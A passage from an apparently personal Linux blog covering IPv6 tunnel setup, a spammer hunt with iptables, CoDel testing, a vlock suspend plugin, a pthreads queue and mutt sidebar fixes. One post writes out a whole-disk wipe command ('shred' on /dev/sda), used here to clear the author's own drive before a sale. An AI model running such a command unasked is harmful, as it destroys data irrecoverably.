Sooo... I'm finally part of the IPv6 world now, and so is this blog. I've been meaning to do this for a long time now, but ... you know. – I ran into some traps – partly my own fault – so I might just share it for others, too.

First of all, and this got me several times: when testing, loosen up your iptables settings. That especially means setting the right policies in ip6tables: ip6tables -P INPUT ACCEPT. (I had set the default policy to DROP before automatically at interface-up time. It's better safe than sorry. Do you know what services listen on :: by default?)

I started out using a simple Teredo tunnel, which worked well enough. See Bart's article ipv6 on your desktop in 2 steps. The default gai.conf, used by the glibc to resolve hosts, will still prefer IPv4 addresses over IPv6 if your only access is a Teredo tunnel. You can change this by commenting out the default label policies in /etc/gai.conf, except for the #label 2001:0::/32 7 line. (See here for example. The blog post advises to reboot or wait 15 minutes, but for me it was enough to re-start my browser / newsreader / ...)

So I set up IPv6 on my server. This was rather easy because Hetzner provides native v6. The real work is just re-creating the iptables rules, adding new AAAA records for DNS. Strike that: The real work is teaching all your small tools to accept IPv6-formatted addresses. (Great efforts are underway to modernize many programs. But especially your odd Perl script will simply choke on the new log files. :-P)
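For tools written in C, accepting both address formats mostly means no longer assuming dotted quads. A minimal sketch using inet_pton(), with ip_version as a name invented for this example:

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

/* Returns 4 for a valid IPv4 literal, 6 for a valid IPv6 literal,
 * 0 if the string is neither. */
int ip_version(const char *s)
{
    struct in_addr v4;
    struct in6_addr v6;

    if (inet_pton(AF_INET, s, &v4) == 1)
        return 4;
    if (inet_pton(AF_INET6, s, &v6) == 1)
        return 6;
    return 0;
}
```

This only classifies literal addresses; host names such as plenz.com are rejected and would need a resolver call instead.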

I am still not sure how I should use all these addresses. For now I enabled one "main" IP for the server, 2a01:4f8:150:4022::2. Then I have one for plenz.com and one for the blog, ending in leet-speak "blog": 2a01:4f8:150:4022::b109 – Is it useful to enable one ip for every subdomain and service? It sure seems nice, but also a big administrative burden...

Living with the Teredo tunnel for some hours, I wanted to do it "the right way", i.e. enabling IPv6 tunneling on my router. Over at HE's Tunnelbroker you'll get your free tunnel, suitable for connecting your home network.

I'm still using an old OpenWRT WhiteRussian setup with 2.4 kernel, but everything works surprisingly well, once I figured out how to do it properly. HE conveniently provides commands to set up the tunnel; however, setting up the tunnel creates a default route that routes packets destined to your prefix across the tunnel. (I don't know why this is the case.) Thus, after establishing the tunnel, I'm doing:

# send traffic destined to my prefix via the LAN bridge br0
ip route del <prefix>::/64 dev he-ipv6
ip route add <prefix>::/64 dev br0

Second, I want to automatically update my IPv6 tunnel endpoint address. HE conveniently provides an IPv4 interface for that. Simply md5-hash your password via echo -n PASS | md5sum, find out your user name hash from the login start page (apparently not the md5 hash of your username :-P) and your tunnel ID. My script looks like this:

root@ndogo:~# cat /etc/ppp/ip-up.d/he-tunnel
#!/bin/sh
set -x

my_ip="$(ip addr show dev ppp0 | grep '    inet ' | awk '{print $2}')"
wget -O /dev/null "http://ipv4.tunnelbroker.net/ipv4_end.php?ipv4b=$my_ip&pass=PWHASH&user_id=UHASH&tunnel_id=TID"

ip tunnel del he-ipv6
ip tunnel add he-ipv6 mode sit remote 216.66.86.114 local $my_ip ttl 255

# watch the MTU!
ip link set dev he-ipv6 mtu 1280
ip link set he-ipv6 up
ip addr add <prefix>::2/64 dev he-ipv6
ip route add ::/0 dev he-ipv6 mtu 1280

# fix up the routes
ip route del <prefix>::/64 dev he-ipv6
ip route add <prefix>::/64 dev br0 2>/dev/null

Side note: Don't think that scripts under /etc/ppp/ip-up.d would get executed automatically when the interface comes up. Use something like this instead:

root@ndogo:~# cat /etc/hotplug.d/iface/20-ipv6
#!/bin/sh

[ "${ACTION:-ifup}" = "ifup" ] && /etc/ppp/ip-up.d/he-tunnel

The connection seemed to work nicely at first. At least, all Google searches were using IPv6 and were fast at that. However, oftentimes (in about 80% of cases) establishing a connection via IPv6 was not working. Pings (and thus traceroutes) showed no network outage or other delays along the way. However, tcpdump showed wrong checksums for a lot of TCP packets.

Only today I got an idea why this might be: wrong MTU. So I set the MTU to 1280 in the HE web interface and on the router, too: ip link set dev he-ipv6 mtu 1280. Suddenly, all connections work perfectly.
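The arithmetic behind the MTU fix can be sketched roughly as follows. This is only an illustration under assumptions that are not stated above: that the uplink is PPPoE with a link MTU of 1492 bytes, and that the tunnel is plain 6in4 (mode sit), which prepends one 20-byte IPv4 header to every IPv6 packet. The function names are made up for the example.

```c
/* Size of the outer IPv4 header (without options) that a 6in4 "sit"
 * tunnel prepends to every IPv6 packet. */
#define IPV4_HEADER_LEN 20

/* Smallest MTU that every IPv6 link must support. */
#define IPV6_MIN_MTU 1280

/* Hypothetical helper: largest IPv6 packet that fits through a 6in4
 * tunnel running over a link with the given IPv4 MTU. */
int sit_tunnel_mtu(int link_mtu)
{
    return link_mtu - IPV4_HEADER_LEN;
}

/* Returns 1 if a tunnel MTU is usable on that link: not smaller than
 * the IPv6 minimum and not larger than what the link can carry. */
int tunnel_mtu_ok(int link_mtu, int tunnel_mtu)
{
    return tunnel_mtu >= IPV6_MIN_MTU
        && tunnel_mtu <= sit_tunnel_mtu(link_mtu);
}
```

With the assumed 1492-byte link, sit_tunnel_mtu() yields 1472, so a tunnel MTU of 1480 would be too large while 1280 fits with room to spare.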

I've been toying around with the privacy extensions, too, but I don't know how to enable the mode "one IP per new service provider". There's some information about the PEs here but for now I have disabled them.

My flatmate's Windows computer and iPhone picked up IPv6 without further configuration.

I'm actually astonished how many web sites are IPv6 ready. So far I like what I'm seeing.

Update: While setting up an AAAA record for the blog, I forgot it had been a wildcard CNAME previously. The blog was not reachable via IPv4 for a day – that was not intended! ;-)

posted 2012-08-06 ∴ tagged ipv6, linux, blog and iptables

Find the Spammer

A week ago our server was listed as sending out spam by the CBL, which is part of the XBL which in turn is part of the widely-used Spamhaus ZEN block list. As a practical result, we couldn't send out mail to GMX or Hotmail any more:

<someone@gmx.de>: host mx0.gmx.net[213.165.64.100] said:
550-5.7.1 {mx048} The IP address of the server you are using to connect to GMX is listed in
550-5.7.1 the XBL Blocking List (CBL + NJABL). 550-5.7.1 For additional information, please visit
550-5.7.1 http://www.spamhaus.org/query/bl?ip=176.9.34.52 and
550 5.7.1 ( http://portal.gmx.net/serverrules ) (in reply to RCPT TO command)

The first source we identified was a postfix alias forwarding to a virtual alias domain; however, I had deleted the user in the latter table, such that postfix would return a "user unknown in virtual alias table" error to the sender. But because the sender was localhost, postfix would create a bounce mail. (This is known as Backscatter.)

But one day later, our IP was listed in CBL again. So I started digging deeper. How do you identify who is sending out spam? There are some obvious points to start:

Old WordPress installations and the like that got owned
Open Relay (mis-configured postfix)
Spam-sending trojan (local process running)

To get a clearer image of what was really happening, I did two things. First, I implemented a very simple "who is doing SMTP" log mechanism using iptables. It went like this:

$ cut -d: -f1 /etc/passwd | while read user; do
    echo iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner $user -j LOG --log-prefix \"$user tried SMTP: \" --log-level 6;
  done
iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner root -j LOG --log-prefix "root tried SMTP: " --log-level 6
iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner feh -j LOG --log-prefix "feh tried SMTP: " --log-level 6
...

(To be honest I used a Vim macro to make the list of rules, but that's hard to write down in a blog post.)
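If you prefer a small program over a macro, the same list of rules could be generated like this. It is a sketch, not what I actually ran: the function names are invented, and getpwent() walks the whole password database (which may include more than /etc/passwd, depending on your NSS setup).

```c
#define _XOPEN_SOURCE 700
#include <pwd.h>
#include <stdio.h>

/* Format one LOG rule for the given user name into buf.
 * Returns whatever snprintf() returns (the untruncated length). */
int format_smtp_log_rule(char *buf, size_t len, const char *user)
{
    return snprintf(buf, len,
        "iptables -A POSTROUTING -p tcp --dport 25 -m owner "
        "--uid-owner %s -j LOG --log-prefix \"%s tried SMTP: \" "
        "--log-level 6", user, user);
}

/* Print one rule per entry of the password database. */
void print_smtp_log_rules(void)
{
    struct passwd *pw;
    char rule[512];

    setpwent();
    while ((pw = getpwent()) != NULL) {
        format_smtp_log_rule(rule, sizeof rule, pw->pw_name);
        puts(rule);
    }
    endpwent();
}
```

Calling print_smtp_log_rules() from main() prints the commands; as with the shell loop, you review the output and then pipe it to a shell.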

Second, I NAT'ed all users except for postfix to a different IP address:

$ iptables -A POSTROUTING -p tcp --dport 25 -m owner ! --uid-owner postfix \
    -j SNAT --to-source 176.9.247.94

Then, I dumped the SMTP-related TCP flows for that IP address:

$ tcpflow -c 'host 176.9.247.94 and (dst port 25 or src port 25)'

I waited for a short time, and soon another wave of spam was sent out. Now I could clearly identify the user:

Jul 19 16:48:35 noam kernel: [5590933.619960] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...
Jul 19 16:48:38 noam kernel: [5590936.616860] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...
Jul 19 16:48:44 noam kernel: [5590942.615608] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...

But instead of finding an infected web app, I found that the user was logged in via SSH and was executing sleep 3600 commands. When I killed the SSH session, the spamming stopped immediately.

Since this was not a user I know personally, I don't know what happened. My best guess is an infected Windows computer and an SSH SOCKS forwarding setup that allowed the (Romanian) spammer to tunnel their connections.

One question remains: Are modern spam-drones able to steal WinSCP/PuTTY login credentials from the Registry and use them to silently set up SSH tunnels? Or was this just a case of bad luck?

posted 2012-07-21 ∴ tagged linux, iptables and spam

Trying the CoDel Bufferbloat solution locally

I'm currently working on a computer science project where we try to understand and possibly research solutions to the bufferbloat phenomenon. We created some simple RRD graphing automatism to better visualize the phenomenon.

In short – and most internet users would say this is perfectly normal behaviour – Bufferbloat describes that with high-speed uploads or downloads, network latency skyrockets. For my home router and a five-megabyte upload, it looks like this:

Normal Bufferbloat

The grid intervals are in seconds and feature 10 data points corresponding to 10 pings in that second to a server (here 8.8.8.8). Lighter blue means further away from the median, which for clarity is displayed as a black line, too. – Thus you can see that the nearly constant ping time of ~20ms goes up to an unsteady ~140ms during the upload.

In the next-20120524 kernel tree the codel and fq_codel queuing disciplines were made available. The CoDel implementation is based on this month's paper by Kathleen Nichols and Van Jacobson, which is definitely worth a read (and features good explanatory diagrams, too).

So I set out to try fq_codel locally first, that is: limiting my Wifi output rate to the supposed output rate of my cable modem and then re-do the same upload.

With tc-commands, this resolves to this:

IF=wlan0
tc qdisc del dev $IF root
tc qdisc add dev $IF root handle 1: htb
tc class add dev $IF parent 1: classid 1:1 htb rate 125kbps
tc qdisc add dev $IF parent 1:1 handle 10: fq_codel
tc filter add dev $IF protocol ip prio 1 u32 match ip dst 0.0.0.0/0 flowid 1:1

And guess what happens? The upload that took 45.7 seconds before now takes 46.9 seconds; but the median ping times are around 30ms as opposed to ~140ms. (Also, consider that the packet loss is down to 0% as opposed to 1.5% before.) So this is really nice:

Bufferbloat / CoDel
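To get a feeling for what these latencies mean in terms of buffered data, here is a back-of-the-envelope sketch. It assumes that the uplink drains at the 125 kilobytes per second used in the tc commands (tc's kbps unit, taken here as 1000 bytes) and that all of the additional latency is queueing delay; the function name is made up.

```c
/* Bytes that must be sitting in a queue to add `delay_ms` milliseconds
 * of latency on a link that drains `rate_bytes_per_s` bytes/second. */
long queued_bytes(long rate_bytes_per_s, long delay_ms)
{
    return rate_bytes_per_s * delay_ms / 1000;
}
```

Under these assumptions, the jump from ~20ms to ~140ms corresponds to queued_bytes(125000, 120), i.e. 15000 bytes or about ten full-size packets waiting in the buffer, whereas the ~10ms added with fq_codel correspond to 1250 bytes.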

I hope I can test this with my colleagues using a fresh CeroWRT install next week such that we can control all the parameters and do more accurate measurements.

Update: The default 13 parameter to the root handle HTB qdisc that was present in the original version of this post is unnecessary and was thus removed.

posted 2012-05-28 ∴ tagged linux and bufferbloat

New screens

I have a pair of new monitors (Dell U2312HM, find them here). I used to have one somewhat cheap 18.5" widescreen with 1366x768 (which is the same resolution as my Thinkpad X220), but reading long texts or working long hours really tired my eyes a lot.

The new screens have nice 23" IPS panels with great viewing angles. But most important of all, I can adjust the height of the screens and rotate them. Now my desk looks like this:

The X220 can only have two monitors connected at once. Also, the Docking Station's DVI output is single link. Thus, I connect one of the monitors via VGA and the other via DVI.

I use a simple shell script that is invoked when I press Fn+F7. Note that you have to turn off the LVDS1 internal display first before you can activate the two screens at once.

if [ $(xrandr -q | grep -c "   1920x1080      60.0 +") -eq 2 ]; then
  xrandr --output LVDS1 --off
  xrandr --output HDMI3 --auto --rotate left --output VGA1 --auto --right-of HDMI3 --primary
else
  xrandr --output VGA1 --off --output HDMI3 --off
  xrandr --output LVDS1 --auto
fi

posted 2012-05-19 ∴ tagged x220 and linux

minimizing Linux filesystem cache effects

Last weekend I toyed around a bit and tried to write a shared object library that can be used via LD_PRELOAD to minimize the effect a program has on the Linux filesystem cache.

Basically the use case is that you have a productive system running, and you don't want your backup script to fill the filesystem cache with mostly useless information at night (files that were cached should stay cached). I didn't test whether this brings measurable improvements yet.
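One mechanism Linux offers for this kind of thing is posix_fadvise() with POSIX_FADV_DONTNEED, which asks the kernel to drop a file's pages from the cache. The following is a minimal sketch of that idea only; the helper name is hypothetical, and the actual library has to do more than this (for instance, it should leave alone pages that were already cached before).

```c
#define _XOPEN_SOURCE 600
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical helper: ask the kernel to drop the cached pages of an
 * open file. Dirty pages cannot be dropped, so flush them first.
 * Returns 0 on success, -1 if flushing failed, or the positive error
 * number returned by posix_fadvise(). */
int drop_file_cache(int fd)
{
    if (fdatasync(fd) == -1)
        return -1;
    /* offset 0 with length 0 means "the whole file" */
    return posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
}
```

A wrapper loaded via LD_PRELOAD could call something like this from its own close(), just before handing over to the real close().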

The coding was really fun and provided me with yet another insight how the simple concept of file descriptors in UNIX is just great. (GNU software is tough, though: I got stuck once, and found help on Stackoverflow, which I had never used before.)

posted 2012-02-09 ∴ tagged linux, c and hack

shredding

I'm currently shredding my old X41's hard drive, because I want to sell it (if you are interested, contact me). I'm overwriting it with ten passes of random data, followed by a final pass of zeros:

$ shred -vfz -n 10 /dev/sda

Luckily, the disk was fully encrypted all the time. So it's just a precaution.

posted 2012-01-30 ∴ tagged x41 and linux

Ten Years of Vim

About ten years ago, I began using Vim. Since about eight years ago, I have been using Vim for every email, every piece of code, literally every text I write. Today, I want to write a short text about how I came to use Vim and what I like about it.

I don't really remember when I first used Vim. It must have been around the time when I was programming PHP a lot. I had access to a "real" computer at home – running Windows XP – in 2002 for the first time; before that, I could only use older Macintoshes. It's typical for first-time Vi users to stumble into believing – by hearsay, I guess – that it is indeed a really superior editor, until they try it out the first time and can't even save, because they don't know how to. Those were probably my first experiences, too.

Anyhow, at some point in time I ditched PHP Zend Studio for SciTE. Later, I got to know Vim (i.e., by reading a tutorial about it and actually understanding it) and was instantly hooked. Probably, the guys over at #html.de talked me into it. Ironically, I used Vim before I ever used a UNIX-like operating system.

In my Vim learning curve, I identify seven important advances:

Understanding the Modes Concept. – This, of course, is something everybody needs to grok. It's fairly straight-forward, once you think about it.
Understanding the Visual Mode and Yank/Paste. – Line-wise selection already gives you more power than a regular editor when moving code.
Understanding Mappings and Macros. – Even today I am amazed how few people automate things. If it's one line, do it manually. If it's three lines, carefully think about the task while recording a macro for it!
Understanding Windows. – Multiple files and stuff.
Consistently using [h], [j], [k], [l]. – This actually was a much bigger step than you might think. I went to great lengths to achieve this: I mapped the arrow keys to :echoerr a message. Today, I configure all programs to use Vim key bindings, especially for horizontal and vertical navigation. It's the first thing to do. I only use the arrow keys for Mplayer seeking.
Using Text Objects. – See :help text-objects, if you don't know about them.
Switching to a US keyboard layout. – Once you do this, all the Vim commands begin to make sense. (I used a German layout before.)

Steps 1–5 happened in the first two years. Text objects only came with more recent Vim development, and I'm not quite sure when I adopted them. Learning the US layout was around 2006, maybe.

When I switched to using Debian in 2004, using Vim for all tasks already felt natural. Of course, at that point I finally came to understand Vim not merely as a text editor, but as a philosophy. And that is what fascinates me to this day: The Vi way of editing text is much more than a set of clever key bindings. It's a language.

Vi-vs.-Emacs fight

In a way, I'm really professional at using Vim. If I think of the tasks I do, I suspect there are very few superfluous keys I press during editing. I have acquired a really good intuition of how to skip to a particular line, to a particular function parameter or a certain word in a sentence. (I use [H], [M], [L] for global on-screen navigation a lot, and I heavily use the [f], [t], [F] and [T] jump commands.) Just as you don't actually think about the letters you type when you become a good typist, I don't think about what command keys I press in Normal mode. I just press them, and the cursor magically moves around to where my eyes rest. This is good.

On the other hand, I am just using core Vim features, most of which are already found in original Vi implementations. My really conservative .vimrc change history shows that I have pretty much settled my editing habits. – But: I have never used a third-party plugin before. Strange as it may sound, I never felt the urge to do so. Command-T certainly looks like it could be of use; however, I usually start a new Vim instance and go with the Z Shell completion, which I suspect to be superior in more than one way, to find the file(s). – Thus I must acknowledge that there might be vast possibilities yet to discover. (Oh, and while confessing, there's another big one: I have never used Emacs. All I know about it is hearsay.)

For keyboard enthusiasts, there are two quirks with Vim: It mainly relies on Escape for mode switches, and the keys for many combinations are aligned for QWERTY layouts. There's just no way around it: while [c] and [d] are mnemonic for cut and delete, [h], [j], [k], [l] simply aren't. There's no way to justify their use when switching to Dvorak, and that's why I didn't (switch). I also once tried mapping [j][j] to Escape, or using the Caps Lock key as Escape replacement; I couldn't really stick to either. (I also stick to calling vim on the command line instead of a shorter alias. It is the fourth most frequent command I type, after sudo, git, and man.)

For me, text editing is equal to using Vim. I feel like a four-year old moving a mouse when I'm forced to use another editor on other people's computers. And because text editing is really clumsy with regular text editors, I no longer wonder why people don't really bother to correct errors: the effort is just not worth it.

If I had to sum up the difference between Vim and other editors in one sentence, it is this: While other editors are great for creating text, Vim is also great at manipulating text. And text manipulation, for most programmers and authors, is what it's all about.

:wq

posted 2012-01-30 ∴ tagged linux and vim

vlock and suspend to ram

I've had weird race conditions when using vlock together with s2ram. It appears suspend to ram wants to switch VTs, while vlock hooks into the switch requests and explicitly disables them. So some of the time, the machine would not suspend, while at other times, vlock wouldn't be able to acquire the VT.

To solve this, I wrote a simple vlock plugin, which simply clears the lock mechanism, writes mem to /sys/power/state and later reinstates the locking mechanism. This plugin is called after all and new. Thus, the screen will be locked properly before suspending.

Here's my suspend.c:

#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

/* Include this header file to make sure the types of the dependencies
 * and hooks are correct. */
#include "vlock_plugin.h"
#include "../src/console_switch.h"

const char *succeeds[] = { "all", "new", NULL };
const char *depends[] =  { "all", "new", NULL };

bool vlock_start(void __attribute__ ((__unused__)) **ctx_ptr)
{
    int fd;

    unlock_console_switch();

    if((fd = open("/sys/power/state", O_WRONLY)) != -1) {
        if(write(fd, "mem", 3) == -1)
            perror("suspend: write");
        close(fd);
    }

    lock_console_switch();

    return true;
}

Simply paste it to the vlock modules folder, make suspend.so and copy it to /usr/lib/vlock/modules. I now invoke it like this:

env VLOCK_PLUGINS="all new suspend" vlock

posted 2012-01-20 ∴ tagged linux and c

Xorg, really?!

Are you fucking kidding me? You reintroduce broken behaviour that possibly has devastating security consequences and make it the default?! Yeah I agree the "usual" X server locking approach is not the best way to do it – but to knowingly smash the security of people's computers on a grand scale... that's priceless.

(My locking solution is env USER=feh vlock -a -n, again.)

Update: Why it happened

posted 2012-01-20 ∴ tagged linux and rant

zsh: complete words from tmux pane

Today I wrote a rather cool Z-Shell completion function: It will present all words that are found in the current tmux pane in a zsh completion menu. That means you can actually complete words from the output of commands that you just executed. (In a way it's a little bit like the keeper function, without the overhead of remembering to call keeper in the first place.)

The code below defines two keybindings:

Ctrl-X t to do a prefix completion: only words from the pane that share the same prefix will be presented
Ctrl-X Ctrl-X to do a "find stuff like crazy" completion. If you see the output and just enter something from the middle of the word, it'll just as well complete. For example, if you see 176.9.247.89 somewhere in the pane, try typing .9 and hitting Ctrl-X twice. It'll complete to that IP address.

Here's the code:

_tmux_pane_words() {
  local expl
  local -a w
  if [[ -z "$TMUX_PANE" ]]; then
    _message "not running inside tmux!"
    return 1
  fi
  w=( ${(u)=$(tmux capture-pane \; show-buffer \; delete-buffer)} )
  _wanted values expl 'words from current tmux pane' compadd -a w
}

zle -C tmux-pane-words-prefix   complete-word _generic
zle -C tmux-pane-words-anywhere complete-word _generic
bindkey '^Xt' tmux-pane-words-prefix
bindkey '^X^X' tmux-pane-words-anywhere
zstyle ':completion:tmux-pane-words-(prefix|anywhere):*' completer _tmux_pane_words
zstyle ':completion:tmux-pane-words-(prefix|anywhere):*' ignore-line current
zstyle ':completion:tmux-pane-words-anywhere:*' matcher-list 'b:=* m:{A-Za-z}={a-zA-Z}'

How does it work? _tmux_pane_words will just capture the current pane's contents (capture-pane), print out the buffer that contains it (show-buffer) and then delete it again (delete-buffer). – The rest of the magic happens via Zsh's excellent completion mechanisms.

See it in action (after typing spm^X^X):

Update 2013-10-06: Daniel points out that since March ’13, there is a switch -p for capture-pane to print the contents to stdout; also, using the newly introduced -J switch, wrapped words will be joined. See his adaption here.

posted 2012-01-19 ∴ tagged zsh, tmux and linux

trying pthreads

Today I played around with POSIX threads a little. In an assignment, we have to implement a very, very simple webserver that does asynchronous I/O. Since it should perform well, I thought I'd not only serialize I/O, but also parallelize it.

So there's a boss that just accepts new inbound connections and appends the fds to a queue:

clientfd = accept(sockfd, (struct sockaddr *) &client, &client_len);
if(clientfd == -1)
    error("accept");
new_request(clientfd);

The new_request function in turn appends it to a queue (of size TODOS = 64), and emits a cond_new signal for possibly waiting workers:

pthread_mutex_lock(&mutex);
while((todo_end + 1) % TODOS == todo_begin) {
    fprintf(stderr, "[master] Queue is completely filled; waiting\n");
    pthread_cond_wait(&cond_ready, &mutex);
}
fprintf(stderr, "[master] adding socket %d at position %d (begin=%d)\n",
    clientfd, todo_end, todo_begin);
todo[todo_end] = clientfd;
todo_end = (todo_end + 1) % TODOS;
pthread_cond_signal(&cond_new);
pthread_mutex_unlock(&mutex);

The workers (there being 8) will just emit a cond_ready, possibly wait until a cond_new is signalled, and then extract the first client fd from the queue. After that, a simple function involving some reads and writes will handle the communication on that fd.

pthread_mutex_lock(&mutex);
pthread_cond_signal(&cond_ready);
while(todo_end == todo_begin)
    pthread_cond_wait(&cond_new, &mutex);
clientfd = todo[todo_begin];
todo_begin = (todo_begin + 1) % TODOS;
pthread_mutex_unlock(&mutex);

// handle communication on clientfd

(Full source is here: webserver.c.)
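For reference, the queue logic from the two snippets above can be packed into one self-contained unit. This is a sketch and not the code from webserver.c: the struct and function names are made up, and it differs in one detail, namely that the worker signals cond_ready only after it has actually removed an entry instead of before waiting. I have not tested whether this changes the behaviour described below.

```c
#include <pthread.h>

#define TODOS 64

/* Ring buffer of client fds; one slot always stays empty so that
 * "full" and "empty" can be told apart. */
struct fd_queue {
    int todo[TODOS];
    int begin, end;
    pthread_mutex_t mutex;
    pthread_cond_t cond_new;    /* signalled when an fd was added */
    pthread_cond_t cond_ready;  /* signalled when a slot was freed */
};

void fd_queue_init(struct fd_queue *q)
{
    q->begin = q->end = 0;
    pthread_mutex_init(&q->mutex, NULL);
    pthread_cond_init(&q->cond_new, NULL);
    pthread_cond_init(&q->cond_ready, NULL);
}

/* Called by the boss thread: blocks while the queue is full. */
void fd_queue_push(struct fd_queue *q, int fd)
{
    pthread_mutex_lock(&q->mutex);
    while ((q->end + 1) % TODOS == q->begin)
        pthread_cond_wait(&q->cond_ready, &q->mutex);
    q->todo[q->end] = fd;
    q->end = (q->end + 1) % TODOS;
    pthread_cond_signal(&q->cond_new);
    pthread_mutex_unlock(&q->mutex);
}

/* Called by a worker thread: blocks while the queue is empty. */
int fd_queue_pop(struct fd_queue *q)
{
    int fd;

    pthread_mutex_lock(&q->mutex);
    while (q->end == q->begin)
        pthread_cond_wait(&q->cond_new, &q->mutex);
    fd = q->todo[q->begin];
    q->begin = (q->begin + 1) % TODOS;
    /* signal only now that a slot is actually free */
    pthread_cond_signal(&q->cond_ready);
    pthread_mutex_unlock(&q->mutex);
    return fd;
}
```

The boss would call fd_queue_push() after every accept(), and each worker would loop over fd_queue_pop(). Compile with -pthread.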

Now this works pretty well and is fairly easy. I'm not very experienced with threads, though, and run into problems when I do massive parallel requests.

If I run ab, the Apache Benchmark tool with 10,000 requests, 1,000 concurrent, on the webserver it'll go up to 9000-something requests and then lock up.

$ ab -n 10000 -c 1000 http://localhost:8080/index.html
...
Completed 8000 requests
Completed 9000 requests
apr_poll: The timeout specified has expired (70007)
Total of 9808 requests completed

The webserver is blocked; its last line of output reads like this:

[master] Queue is completely filled; waiting

If I attach strace while in this blocking state, I get this:

$ strace -fp `pidof ./webserver`
Process 21090 attached with 9 threads - interrupt to quit
[pid 21099] recvfrom(32,  <unfinished ...>
[pid 21098] recvfrom(23,  <unfinished ...>
[pid 21097] recvfrom(31,  <unfinished ...>
[pid 21095] recvfrom(35,  <unfinished ...>
[pid 21094] recvfrom(34,  <unfinished ...>
[pid 21093] recvfrom(33,  <unfinished ...>
[pid 21092] recvfrom(26,  <unfinished ...>
[pid 21091] recvfrom(24,  <unfinished ...>
[pid 21090] futex(0x6024e4, FUTEX_WAIT_PRIVATE, 55883, NULL

So the children seem to be starving on unfinished recv calls, while the master thread waits for any children to work away the queue. (With a queue size of 1024 and 200 workers I couldn't reproduce the situation.)

How can one counteract this? Specify a timeout? Spawn workers on demand? Set the listen() backlog argument to a low value? – or is it all Apache Benchmark's fault? *confused*
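Of these options, the timeout is the easiest one to try. A minimal sketch, assuming the workers use plain blocking recv() calls; the helper name is hypothetical, and I make no claim that this alone resolves the lockup:

```c
#include <sys/socket.h>
#include <sys/time.h>

/* Hypothetical helper: make blocking reads on a socket give up after
 * `seconds`. A recv() that times out then returns -1 with errno set
 * to EAGAIN or EWOULDBLOCK. Returns 0 on success, -1 on error. */
int set_recv_timeout(int fd, int seconds)
{
    struct timeval tv;

    tv.tv_sec = seconds;
    tv.tv_usec = 0;
    return setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);
}
```

A worker would call set_recv_timeout(clientfd, 5) right after taking the fd from the queue, and close the connection when recv() fails with a timeout, so that a silent client cannot occupy the worker forever.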

posted 2012-01-17 ∴ tagged linux and c

mutt sidebar patch improvements

It is generally accepted as an almost universal truth that mutt sucks, but is the MUA that sucks less than all others. While people use either Vim or Emacs and fight about it, I hardly see any people fight about whether mutt is good or bad. There is, to my knowledge, no alternative worth mentioning.

Mutt dates back well into the mid-nineties. As you might imagine, with lots of contributors over the course of almost two decades, the code quality is rather messy.

When development had stalled for quite a while in the mid-2000's, a fork was attempted. While mutt-ng was quite popular for a while, most changes were incorporated back into mainline mutt at some point. (Ironically, the latest article in the mutt-ng development blog is from October 2006 and is titled "mutt-ng isn't dead!"). The development of main mutt gained some momentum again, triggered in large parts by the contributions of late Rocco Rutte.

I remember two big features that the original mutt authors just wouldn't integrate into mainline: The headercache patch and the sidebar patch. About the former I can't say anything, but lately I've been fixing the Sidebar patch in various places. (We use mutt at work and rely heavily on e-mail communication, so we'd like a bug-free user agent, naturally.)

When all the mutt forking went on about five years ago, I didn't know much about it. In retrospect, I see that the people involved did a hell of a job. Long before mutt-ng was forked, Sven told me he and Mika met in Graz for several weeks to sift and sort through the available patches, intending to do a "super patch".

Mutt's code quality is arguably rather messy.

There's a wild mix of 2-, 4- or 8-space indentation, often mixed with tabs (or vice versa)
The user interface is completely tangled with application logic
It uses curses directly. Go figure

On top of that, the Sidebar patch tries to make it even worse. Imagine this: mutt draws a mail from position (line=x,char=0) to the end of the line. Now the sidebar patch will introduce a left "margin", such that the sidebar can be drawn there. Thus, all code parts where a line is started from the leftmost character have to be rewritten to check if the sidebar is active and possibly start drawing at (line=x,char=20).

The sidebar code quality is a fringe case of bad code. Really, it sucks. However, there's no real way to "do it right", since original mutt never planned for a sidebar.

Who maintains the sidebar patch? – Not sure. There's a version at thomer.com, but he says:

July 20, 2006 I quit. Sadly, there seems to be no desire to absorb the sidebar patch into the main source tree.

The most up-to-date version is found at Lunar Linux. Last update is from mid-2009.

Debian offers a mutt-patched package that includes the sidebar patch, albeit in a different version than usually found 'round the net. In short, this patch is a mess, too.

But since I made all the fixes, I decided to contact the package's maintainer, Antonio Radici. He promptly responded and said he'd happily fix all the issues, so I started by opening two bug reports. Nothing has happened since.

The patches run quite stably for my colleagues, so I think it's best to release them. Maybe someone else can use them. Please note that I have absolutely no interest in taking over any Sidebar patch maintenance. ;-)

For some of the patches I provide annotations. They all feature quite descriptive commit messages, and apply cleanly on top of the Debian mutt repository's master branch.

The first four patches are not by me, they are just the corresponding patches from the debian/patches/ directory applied to have a starting point.

The first few patches fix rather trivial bugs.

Now come the performance critical patches. They are the real reason I was assigned the task to repair the sidebar:

0009-cache-time-when-sidebar-last-counted-all-the-mails.patch

This patch fixes a huge speed penalty. Previously, the sidebar would count the mails (and thus read through the whole mbox) every time that mtime > atime! This is just an incredible oversight by the developer and must have burned hundreds of millions of CPU cycles.

This introduces a member `sb_last_checked' to the BUFFY struct. It
will be set by `mh_buffy_update', `buffy_maildir_update' and
`buffy_mbox_update' when they count all the mails.

Mboxes only: `buffy_mbox_update' will not be run unless the
condition "sb_last_checked > mtime of the file" holds. This solves
a huge performance penalty you obtain with big mailboxes. The
`mx_open_mailbox' call with the M_PEEK flag will *reset* mtime and
atime to the values from before. Thus, you cannot rely on "mtime >
atime" to check whether or not to count new mail.

Also, don't count mail if the sidebar is not active:

Then, I removed a lot of cruft and simply stupid design. Just consider one of the functions I removed:

-static int quick_log10(int n)
-{
-        char string[32];
-        sprintf(string, "%d", n);
-        return strlen(string);
-}

That is just insane.
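For comparison, the same value can be computed without formatting a string at all. This is a sketch for non-negative counts only and not code from the patch; the name decimal_width is invented.

```c
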